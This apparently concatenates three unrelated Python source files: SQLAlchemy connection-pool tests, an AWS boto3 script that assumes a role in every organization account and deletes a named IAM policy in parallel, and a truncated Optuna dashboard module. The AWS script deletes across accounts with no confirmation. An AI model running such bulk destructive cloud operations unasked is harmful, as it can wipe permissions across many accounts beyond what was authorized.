# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
# timeout again within the mutex, and if so, unlocking and throwing
# them back to the start of do_get()
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=lambda: dbapi.connect(delay=0.05),
pool_size=2,
max_overflow=1,
timeout=3,
)
timeouts = []
def checkout():
for x in range(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
# normally, the timeout should under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
reaper = testing.engines.ConnectionKiller()
dbapi = MockDBAPI()
mutex = threading.Lock()
def creator():
time.sleep(0.05)
with mutex:
return dbapi.connect()
p = pool.QueuePool(
creator=creator, pool_size=3, timeout=2, max_overflow=max_overflow
)
reaper.add_pool(p)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(0.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in range(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
self.assert_(max(peaks) <= max_overflow)
reaper.assert_all_closed()
def test_overflow_reset_on_failed_connect(self):
dbapi = Mock()
def failing_dbapi():
raise Exception("connection failed")
creator = dbapi.connect
def create():
return creator()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
c1 = self._with_teardown(p.connect()) # noqa
c2 = self._with_teardown(p.connect()) # noqa
c3 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1)
creator = failing_dbapi
assert_raises(Exception, p.connect)
eq_(p._overflow, 1)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_hanging_connect_within_overflow(self):
"""test that a single connect() call which is hanging
does not block other connections from proceeding."""
dbapi = Mock()
mutex = threading.Lock()
def hanging_dbapi():
time.sleep(2)
with mutex:
return dbapi.connect()
def fast_dbapi():
with mutex:
return dbapi.connect()
creator = threading.local()
def create():
return creator.mock_connector()
def run_test(name, pool, should_hang):
if should_hang:
creator.mock_connector = hanging_dbapi
else:
creator.mock_connector = fast_dbapi
conn = pool.connect()
conn.operation(name)
time.sleep(1)
conn.close()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
threads = [
threading.Thread(target=run_test, args=("success_one", p, False)),
threading.Thread(target=run_test, args=("success_two", p, False)),
threading.Thread(target=run_test, args=("overflow_one", p, True)),
threading.Thread(target=run_test, args=("overflow_two", p, False)),
threading.Thread(
target=run_test, args=("overflow_three", p, False)
),
]
for t in threads:
t.start()
time.sleep(0.2)
for t in threads:
t.join(timeout=join_timeout)
eq_(
dbapi.connect().operation.mock_calls,
[
call("success_one"),
call("success_two"),
call("overflow_two"),
call("overflow_three"),
call("overflow_one"),
],
)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_waiters_handled(self):
"""test that threads waiting for connections are
handled when the pool is replaced.
"""
mutex = threading.Lock()
dbapi = MockDBAPI()
def creator():
with mutex:
return dbapi.connect()
success = []
for timeout in (None, 30):
for max_overflow in (0, -1, 3):
p = pool.QueuePool(
creator=creator,
pool_size=2,
timeout=timeout,
max_overflow=max_overflow,
)
def waiter(p, timeout, max_overflow):
success_key = (timeout, max_overflow)
conn = p.connect()
success.append(success_key)
time.sleep(0.1)
conn.close()
c1 = p.connect() # noqa
c2 = p.connect()
threads = []
for i in range(2):
t = threading.Thread(
target=waiter, args=(p, timeout, max_overflow)
)
t.daemon = True
t.start()
threads.append(t)
# this sleep makes sure that the
# two waiter threads hit upon wait()
# inside the queue, before we invalidate the other
# two conns
time.sleep(0.2)
p._invalidate(c2)
for t in threads:
t.join(join_timeout)
eq_(len(success), 12, "successes: %s" % success)
def test_connrec_invalidated_within_checkout_no_race(self):
"""Test that a concurrent ConnectionRecord.invalidate() which
occurs after the ConnectionFairy has called
_ConnectionRecord.checkout()
but before the ConnectionFairy tests "fairy.connection is None"
will not result in an InvalidRequestError.
This use case assumes that a listener on the checkout() event
will be raising DisconnectionError so that a reconnect attempt
may occur.
"""
dbapi = MockDBAPI()
def creator():
return dbapi.connect()
p = pool.QueuePool(creator=creator, pool_size=1, max_overflow=0)
conn = p.connect()
conn.close()
_existing_checkout = pool._ConnectionRecord.checkout
@classmethod
def _decorate_existing_checkout(cls, *arg, **kw):
fairy = _existing_checkout(*arg, **kw)
connrec = fairy._connection_record
connrec.invalidate()
return fairy
with patch(
"sqlalchemy.pool._ConnectionRecord.checkout",
_decorate_existing_checkout,
):
conn = p.connect()
is_(conn._connection_record.connection, None)
conn.close()
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_notify_waiters(self):
dbapi = MockDBAPI()
canary = []
def creator():
canary.append(1)
return dbapi.connect()
p1 = pool.QueuePool(
creator=creator, pool_size=1, timeout=None, max_overflow=0
)
def waiter(p):
conn = p.connect()
canary.append(2)
time.sleep(0.5)
conn.close()
c1 = p1.connect()
threads = []
for i in range(5):
t = threading.Thread(target=waiter, args=(p1,))
t.start()
threads.append(t)
time.sleep(0.5)
eq_(canary, [1])
# this also calls invalidate()
# on c1
p1._invalidate(c1)
for t in threads:
t.join(join_timeout)
eq_(canary, [1, 1, 2, 2, 2, 2, 2])
def test_dispose_closes_pooled(self):
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=dbapi.connect, pool_size=2, timeout=None, max_overflow=0
)
c1 = p.connect()
c2 = p.connect()
c1_con = c1.connection
c2_con = c2.connection
c1.close()
eq_(c1_con.close.call_count, 0)
eq_(c2_con.close.call_count, 0)
p.dispose()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# currently, if a ConnectionFairy is closed
# after the pool has been disposed, there's no
# flag that states it should be invalidated
# immediately - it just gets returned to the
# pool normally...
c2.close()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# ...and that's the one we'll get back next.
c3 = p.connect()
assert c3.connection is c2_con
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_no_overflow(self):
self._test_overflow(40, 0)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_overflow_no_gc(self):
p = self._queuepool_fixture(pool_size=2, max_overflow=2)
# disable weakref collection of the
# underlying connections
strong_refs = set()
def _conn():
c = p.connect()
strong_refs.add(c.connection)
return c
for j in range(5):
# open 4 conns at a time. each time this
# will yield two pooled connections + two
# overflow connections.
conns = [_conn() for i in range(4)]
for c in conns:
c.close()
# doing that for a total of 5 times yields
# ten overflow connections closed plus the
# two pooled connections unclosed.
eq_(
set([c.close.call_count for c in strong_refs]),
set([1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0]),
)
def test_recycle(self):
with patch("sqlalchemy.pool.base.time.time") as mock:
mock.return_value = 10000
p = self._queuepool_fixture(
pool_size=1, max_overflow=0, recycle=30
)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
mock.return_value = 10001
c2 = p.connect()
is_(c2.connection, c_ref())
c2.close()
mock.return_value = 10035
c3 = p.connect()
is_not(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
p._invalidate(c2)
assert c2_rec.connection is None
c2.close()
time.sleep(0.5)
c3 = p.connect()
is_not(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_soft_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
c2.invalidate(soft=True)
is_(c2_rec.connection, c2.connection)
c2.close()
c3 = p.connect()
is_not(c3.connection, c_ref())
is_(c3._connection_record, c2_rec)
is_(c2_rec.connection, c3.connection)
def _no_wr_finalize(self):
finalize_fairy = pool._finalize_fairy
def assert_no_wr_callback(
connection, connection_record, pool, ref, echo, fairy=None
):
if fairy is None:
raise AssertionError(
"finalize fairy was called as a weakref callback"
)
return finalize_fairy(
connection, connection_record, pool, ref, echo, fairy
)
return patch.object(pool, "_finalize_fairy", assert_no_wr_callback)
def _assert_cleanup_on_pooled_reconnect(self, dbapi, p):
# p is QueuePool with size=1, max_overflow=2,
# and one connection in the pool that will need to
# reconnect when next used (either due to recycle or invalidate)
with self._no_wr_finalize():
eq_(p.checkedout(), 0)
eq_(p._overflow, 0)
dbapi.shutdown(True)
assert_raises_context_ok(Exception, p.connect)
eq_(p._overflow, 0)
eq_(p.checkedout(), 0) # and not 1
dbapi.shutdown(False)
c1 = self._with_teardown(p.connect()) # noqa
assert p._pool.empty() # poolsize is one, so we're empty OK
c2 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1) # and not 2
# this hangs if p._overflow is 2
c3 = self._with_teardown(p.connect())
c3.close()
def test_error_on_pooled_reconnect_cleanup_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.invalidate()
c1.close()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_error_on_pooled_reconnect_cleanup_recycle(self):
dbapi, p = self._queuepool_dbapi_fixture(
pool_size=1, max_overflow=2, recycle=1
)
c1 = p.connect()
c1.close()
time.sleep(1.5)
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_connect_handler_not_called_for_recycled(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
canary = Mock()
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
event.listen(p, "connect", canary.connect)
event.listen(p, "checkout", canary.checkout)
assert_raises(Exception, p.connect)
p._pool.queue = collections.deque(
[c for c in p._pool.queue if c.connection is not None]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
eq_(
canary.mock_calls,
[call.connect(ANY, ANY), call.checkout(ANY, ANY, ANY)],
)
@testing.requires.timing_intensive
def test_connect_checkout_handler_always_gets_info(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
@event.listens_for(p, "connect")
def connect(conn, conn_rec):
conn_rec.info["x"] = True
@event.listens_for(p, "checkout")
def checkout(conn, conn_rec, conn_f):
assert "x" in conn_rec.info
assert_raises(Exception, p.connect)
p._pool.queue = collections.deque(
[c for c in p._pool.queue if c.connection is not None]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
def test_error_on_pooled_reconnect_cleanup_wcheckout_event(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.close()
@event.listens_for(p, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if dbapi.is_shutdown:
raise tsa.exc.DisconnectionError()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.predictable_gc
def test_userspace_disconnectionerror_weakref_finalizer(self):
dbapi, pool = self._queuepool_dbapi_fixture(
pool_size=1, max_overflow=2
)
@event.listens_for(pool, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if getattr(dbapi_con, "boom") == "yes":
raise tsa.exc.DisconnectionError()
conn = pool.connect()
old_dbapi_conn = conn.connection
conn.close()
eq_(old_dbapi_conn.mock_calls, [call.rollback()])
old_dbapi_conn.boom = "yes"
conn = pool.connect()
dbapi_conn = conn.connection
del conn
gc_collect()
# new connection was reset on return appropriately
eq_(dbapi_conn.mock_calls, [call.rollback()])
# old connection was just closed - did not get an
# erroneous reset on return
eq_(old_dbapi_conn.mock_calls, [call.rollback(), call.close()])
@testing.requires.timing_intensive
def test_recycle_pool_no_race(self):
def slow_close():
slow_closing_connection._slow_close()
time.sleep(0.5)
slow_closing_connection = Mock()
slow_closing_connection.connect.return_value.close = slow_close
class Error(Exception):
pass
dialect = Mock()
dialect.is_disconnect = lambda *arg, **kw: True
dialect.dbapi.Error = Error
pools = []
class TrackQueuePool(pool.QueuePool):
def __init__(self, *arg, **kw):
pools.append(self)
super(TrackQueuePool, self).__init__(*arg, **kw)
def creator():
return slow_closing_connection.connect()
p1 = TrackQueuePool(creator=creator, pool_size=20)
from sqlalchemy import create_engine
eng = create_engine(testing.db.url, pool=p1, _initialize=False)
eng.dialect = dialect
# 15 total connections
conns = [eng.connect() for i in range(15)]
# return 8 back to the pool
for conn in conns[3:10]:
conn.close()
def attempt(conn):
time.sleep(random.random())
try:
conn._handle_dbapi_exception(
Error(), "statement", {}, Mock(), Mock()
)
except tsa.exc.DBAPIError:
pass
# run an error + invalidate operation on the remaining 7 open
# connections
threads = []
for conn in conns:
t = threading.Thread(target=attempt, args=(conn,))
t.start()
threads.append(t)
for t in threads:
t.join()
# return all 15 connections to the pool
for conn in conns:
conn.close()
# re-open 15 total connections
conns = [eng.connect() for i in range(15)]
# 15 connections have been fully closed due to invalidate
assert slow_closing_connection._slow_close.call_count == 15
# 15 initial connections + 15 reconnections
assert slow_closing_connection.connect.call_count == 30
assert len(pools) <= 2, len(pools)
def test_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_recreate(self):
p = self._queuepool_fixture(
reset_on_return=None, pool_size=1, max_overflow=0
)
p2 = p.recreate()
assert p2.size() == 1
assert p2._reset_on_return is pool.reset_none
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_detach(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1.detach()
c2 = p.connect() # noqa
eq_(dbapi.connect.mock_calls, [call("foo.db"), call("foo.db")])
c1_con = c1.connection
assert c1_con is not None
eq_(c1_con.close.call_count, 0)
c1.close()
eq_(c1_con.close.call_count, 1)
def test_detach_via_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1_con = c1.connection
c1.invalidate()
assert c1.connection is None
eq_(c1_con.close.call_count, 1)
c2 = p.connect()
assert c2.connection is not c1_con
c2_con = c2.connection
c2.close()
eq_(c2_con.close.call_count, 0)
def test_no_double_checkin(self):
p = self._queuepool_fixture(pool_size=1)
c1 = p.connect()
rec = c1._connection_record
c1.close()
assert_raises_message(
Warning, "Double checkin attempted on %s" % rec, rec.checkin
)
def test_lifo(self):
c1, c2, c3 = Mock(), Mock(), Mock()
connections = [c1, c2, c3]
def creator():
return connections.pop(0)
p = pool.QueuePool(creator, use_lifo=True)
pc1 = p.connect()
pc2 = p.connect()
pc3 = p.connect()
pc1.close()
pc2.close()
pc3.close()
for i in range(5):
pc1 = p.connect()
is_(pc1.connection, c3)
pc1.close()
pc1 = p.connect()
is_(pc1.connection, c3)
pc2 = p.connect()
is_(pc2.connection, c2)
pc2.close()
pc3 = p.connect()
is_(pc3.connection, c2)
pc2 = p.connect()
is_(pc2.connection, c1)
pc2.close()
pc3.close()
pc1.close()
def test_fifo(self):
c1, c2, c3 = Mock(), Mock(), Mock()
connections = [c1, c2, c3]
def creator():
return connections.pop(0)
p = pool.QueuePool(creator)
pc1 = p.connect()
pc2 = p.connect()
pc3 = p.connect()
pc1.close()
pc2.close()
pc3.close()
pc1 = p.connect()
is_(pc1.connection, c1)
pc1.close()
pc1 = p.connect()
is_(pc1.connection, c2)
pc2 = p.connect()
is_(pc2.connection, c3)
pc2.close()
pc3 = p.connect()
is_(pc3.connection, c1)
pc2 = p.connect()
is_(pc2.connection, c3)
pc2.close()
pc3.close()
pc1.close()
class ResetOnReturnTest(PoolTestBase):
def _fixture(self, **kw):
dbapi = Mock()
return (
dbapi,
pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw),
)
def test_plain_rollback(self):
dbapi, p = self._fixture(reset_on_return="rollback")
c1 = p.connect()
c1.close()
assert dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_plain_commit(self):
dbapi, p = self._fixture(reset_on_return="commit")
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert dbapi.connect().commit.called
def test_plain_none(self):
dbapi, p = self._fixture(reset_on_return=None)
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_agent_rollback(self):
dbapi, p = self._fixture(reset_on_return="rollback")
class Agent(object):
def __init__(self, conn):
self.conn = conn
is_active = True
def rollback(self):
self.conn.special_rollback()
def commit(self):
self.conn.special_commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
c1.close()
assert dbapi.connect().special_rollback.called
assert not dbapi.connect().special_commit.called
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
c1 = p.connect()
c1.close()
eq_(dbapi.connect().special_rollback.call_count, 1)
eq_(dbapi.connect().special_commit.call_count, 0)
assert dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_agent_commit(self):
dbapi, p = self._fixture(reset_on_return="commit")
class Agent(object):
def __init__(self, conn):
self.conn = conn
is_active = True
def rollback(self):
self.conn.special_rollback()
def commit(self):
self.conn.special_commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
c1.close()
assert not dbapi.connect().special_rollback.called
assert dbapi.connect().special_commit.called
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
c1 = p.connect()
c1.close()
eq_(dbapi.connect().special_rollback.call_count, 0)
eq_(dbapi.connect().special_commit.call_count, 1)
assert not dbapi.connect().rollback.called
assert dbapi.connect().commit.called
def test_reset_agent_disconnect(self):
dbapi, p = self._fixture(reset_on_return="rollback")
class Agent(object):
def __init__(self, conn):
self.conn = conn
def rollback(self):
p._invalidate(self.conn)
raise Exception("hi")
def commit(self):
self.conn.commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
c1.close()
# no warning raised. We know it would warn due to
# QueuePoolTest.test_no_double_checkin
class SingletonThreadPoolTest(PoolTestBase):
@testing.requires.threading_with_mock
def test_cleanup(self):
self._test_cleanup(False)
# TODO: the SingletonThreadPool cleanup method
# has an unfixed race condition within the "cleanup" system that
# leads to this test being off by one connection under load; in any
# case, this connection will be closed once it is garbage collected.
# this pool is not a production-level pool and is only used for the
# SQLite "memory" connection, and is not very useful under actual
# multi-threaded conditions
# @testing.requires.threading_with_mock
# def test_cleanup_no_gc(self):
# self._test_cleanup(True)
def _test_cleanup(self, strong_refs):
"""test that the pool's connections are OK after cleanup() has
been called."""
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
if strong_refs:
sr = set()
def _conn():
c = p.connect()
sr.add(c.connection)
return c
else:
def _conn():
return p.connect()
def checkout():
for x in range(10):
c = _conn()
assert c
c.cursor()
c.close()
time.sleep(0.01)
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
lp = len(p._all_conns)
is_true(3 <= lp <= 4)
if strong_refs:
still_opened = len([c for c in sr if not c.close.call_count])
eq_(still_opened, 3)
def test_no_rollback_from_nested_connections(self):
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
c1 = p.connect()
mock_conn = c1.connection
c2 = p.connect()
is_(c1, c2)
c2.close()
eq_(mock_conn.mock_calls, [])
c1.close()
eq_(mock_conn.mock_calls, [call.rollback()])
class AssertionPoolTest(PoolTestBase):
def test_connect_error(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
def test_connect_multiple(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect()
c1.close()
c2 = p.connect()
c2.close()
c3 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect()
c1.close()
c1 = None
c1 = p.connect()
c1.invalidate()
c1 = None
c1 = p.connect()
dbapi.connect.assert_has_calls(
[call("foo.db"), call("foo.db")], any_order=True
)
class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
def creator():
return dbapi.connect("foo.db")
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
class CreatorCompatibilityTest(PoolTestBase):
def test_creator_callable_outside_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator()
finally:
conn.close()
def test_creator_callable_outside_witharg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator(Mock())
finally:
conn.close()
def test_creator_patching_arg_to_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
# the creator is the two-arg form
conn = creator(Mock())
finally:
conn.close()
def mock_create():
return creator()
conn = e.connect()
conn.invalidate()
conn.close()
# test that the 'should_wrap_creator' status
# will dynamically switch if the _creator is monkeypatched.
# patch it with a zero-arg form
with patch.object(e.pool, "_creator", mock_create):
conn = e.connect()
conn.invalidate()
conn.close()
conn = e.connect()
conn.close()
|
DeletePolicyOnAllAccounts.py
|
#!/usr/bin/env python
import boto3
import pprint
import argparse
import csv
from multiprocessing import Process
from botocore.exceptions import ProfileNotFound, ClientError
parser = argparse.ArgumentParser(description="Parallel, multi-account execution")
parser.add_argument('--policy',
type=str )
parser.add_argument('--assume_role',
type=str,
default="CloudCoreAdmin" )
parser.add_argument('--organization_owner_id',
type=str, help="Organization OwnerId",
default="730529347585" )
pargs = parser.parse_args()
def getSessionWithAssumeRole(OwnerId=None,RoleName=None):
arn = "arn:aws:iam::{0}:role/{1}".format(OwnerId,RoleName)
response = boto3.client('sts').assume_role(RoleArn=arn, RoleSessionName="mySession")
session = boto3.Session(
aws_access_key_id = response['Credentials']['AccessKeyId'],
aws_secret_access_key = response['Credentials']['SecretAccessKey'],
aws_session_token = response['Credentials']['SessionToken'] )
return session
def getAccountList(OwnerId=None,RoleName=None):
session = getSessionWithAssumeRole(OwnerId=OwnerId,RoleName=RoleName)
accounts = []
response = session.client('organizations').list_accounts()
while True:
for item in response['Accounts']:
if item['Status'] == 'ACTIVE':
accounts.append(item['Id'])
if 'NextToken' not in response:
break
response = session.client('organizations').list_accounts(NextToken=response['NextToken'])
return accounts
def getItemsWithMaxItems(Session=None,MethodName=None,ClientName=None,ItemListKey=None,**kwargs):
function = getattr(Session.client(ClientName), MethodName)
items = []
response = function(**kwargs)
while True:
for item in response[ItemListKey]:
items.append(item)
if response['IsTruncated'] == False:
break
response = function(Marker=response['Marker'],**kwargs)
return items
def delete_policy(Session=None,OwnerId=None,PolicyName=None):
policyArn = "arn:aws:iam::{}:policy/{}".format(OwnerId, PolicyName)
try:
response = Session.client('iam').get_policy(PolicyArn=policyArn)
except:
print("[{1}] policy {0} not found".format(PolicyName, OwnerId))
return
Session.client('iam').delete_policy(PolicyArn=policyArn)
def test_role(Session=None,OwnerId=None,RoleName=None):
try:
response = Session.client('iam').get_role(RoleName=RoleName)
except:
print("[{1}] role {0} not accessible".format(RoleName, OwnerId))
return
if __name__ == '__main__':
accounts = getAccountList(OwnerId=pargs.organization_owner_id,RoleName=pargs.assume_role)
procs = []
for account in accounts:
session = getSessionWithAssumeRole(OwnerId=account,RoleName=pargs.assume_role)
proc = Process(target=delete_policy, args=(session, account, pargs.policy,))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
|
dashboard.py
|
try:
import bokeh.command.bootstrap
import bokeh.document # NOQA
import bokeh.layouts
import bokeh.models
import bokeh.models.widgets
import bokeh.plotting
import bokeh.themes
import tornado.gen
_available = True
except ImportError as e:
_available = False
_import_error = e
import collections
import numpy as np
import threading
import time
import optuna.logging
import optuna.structs
import optuna.study
from optuna import type_checking
if type_checking.TYPE_CHECKING:
from typing import Any # NOQA
from typing import Dict # NOQA
from typing import List # NOQA
from typing import Optional # NOQA
_mode = None # type: Optional[str]
_study = None # type: Optional[optuna.study.Study]
_HEADER_FORMAT = '''
<style>
body {{
margin: 20px;
}}
h1, p {{
margin: 10px 0px;
}}
</style>
<h1>Optuna Dashboard (Beta)</h1>
<p>
<b>Study name:</b> {study_name}<br>
</p>
'''
_DATETIME_FORMAT = '%Y-%m-%d %H:%M:%S'
if _available:
class _CompleteTrialsWidget(object):
def __init__(self, trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
complete_trials = [
trial for trial in trials if trial.state == optuna.structs.TrialState.COMPLETE
]
self.trial_ids = set([trial.trial_id for trial in complete_trials])
values = [trial.value for trial in complete_trials]
best_values = np.minimum.accumulate(values, axis=0)
self.cds = bokeh.models.ColumnDataSource({
'#': list(range(len(complete_trials))),
'value': values,
'best_value': best_values,
})
self.best_value = best_values[-1] if complete_trials else np.inf
def create_figure(self):
# type: () -> bokeh.plotting.Figure
figure = bokeh.plotting.figure(height=150)
figure.circle(x='#', y='value', source=self.cds, alpha=0.3, color='navy')
figure.line(x='#', y='best_value', source=self.cds, color='firebrick')
figure.xaxis[0].axis_label = 'Number of Trials'
figure.yaxis[0].axis_label = 'Objective Value'
return figure
def update(self, new_trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
stream_dict = collections.defaultdict(list) # type: Dict[str, List[Any]]
for trial in new_trials:
if trial.state != optuna.structs.TrialState.COMPLETE:
continue
if trial.trial_id in self.trial_ids:
continue
stream_dict['#'].append(len(self.trial_ids))
stream_dict['value'].append(trial.value)
self.best_value = min(self.best_value, trial.value)
stream_dict['best_value'].append(self.best_value)
self.trial_ids.add(trial.trial_id)
if stream_dict:
self.cds.stream(stream_dict)
class _AllTrialsWidget(object):
def __init__(self, trials):
# type: (List[optuna.structs.FrozenTrial]) -> None
self.cds = bokeh.models.ColumnDataSource(self.trials_to_dict(trials))
def create_table(self):
# type: () -> bokeh.models.widgets.DataTable
return bokeh.models.widgets.DataTable(
source=self.cds,
columns=[
bokeh.models.widgets.TableColumn(field=field, title=field) for field in
['number', 'state', 'value', 'params', 'datetime_start', 'datetime_complete']
])
def update(
self,
old_trials, # type: List[optuna.structs.FrozenTrial]
new_trials, # type: List[optuna.structs.FrozenTrial]
):
# type: (...) -> None
modified_indices = []
modified_trials = []
for i, old_trial in enumerate(old_trials):
new_trial = new_trials[i]
if old_trial != new_trial:
modified_indices.append(i)
modified_trials.append(new_trial)
patch_dict = self.trials_to_dict(modified_trials)
patch_dict = {k: list(zip(modified_indices, v)) for k, v in patch_dict.items()}
self.cds.patch(patch_dict)
self.cds.stream(self.trials_to_dict(new_trials[len(old_trials):]))
@staticmethod
def trials_to_dict(trials):
# type: (List[optuna.structs.FrozenTrial]) -> Dict[str, List[Any]]
return {
'number': [trial.number for trial in trials],
'state': [trial.state.name for trial in trials],
'value': [trial.value for trial in trials],
'params': [str(trial.params) for trial in trials],
'datetime_start': [
trial.datetime_start.strftime(_DATETIME_FORMAT)
if trial.datetime_start is not None else None for trial in trials
],
'datetime_complete': [
trial.datetime_complete.strftime(_DATETIME_FORMAT)
if trial.datetime_complete is not None else None for trial in trials
],
}
class _DashboardApp(object):
def __init__(self, study, launch_update_thread):
# type: (optuna.study.Study, bool) -> None
self.study = study
self.launch_update_thread = launch_update_thread
self.lock = threading.Lock()
def __call__(self, doc):
# type: (bokeh.document.Document) -> None
self.doc = doc
self.current_trials = \
self.study.trials # type: Optional[List[optuna.structs.FrozenTrial]]
self.new_trials = None # type: Optional[List[optuna.structs.FrozenTrial]]
self.complete_trials_widget = _CompleteTrialsWidget(self.current_trials)
self.all_trials_widget = _AllTrialsWidget(self.current_trials)
self.doc.title = 'Optuna Dashboard (Beta)'
header = _HEADER_FORMAT.format(study_name=self.study.study_name)
self.doc.add_root(
bokeh.layouts.layout([[bokeh.models.widgets.Div(text=header)],
[self.complete_trials_widget.create_figure()],
[self.all_trials_widget.create_table()]],
sizing_mode='scale_width'))
if self.launch_update_thread:
thread = threading.Thread(target=self.thread_loop)
thread.daemon = True
thread.start()
def thread_loop(self):
# type: () -> None
while True:
time.sleep(1)
new_trials = self.study.trials
with self.lock:
need_to_add_callback = (self.new_trials is None)
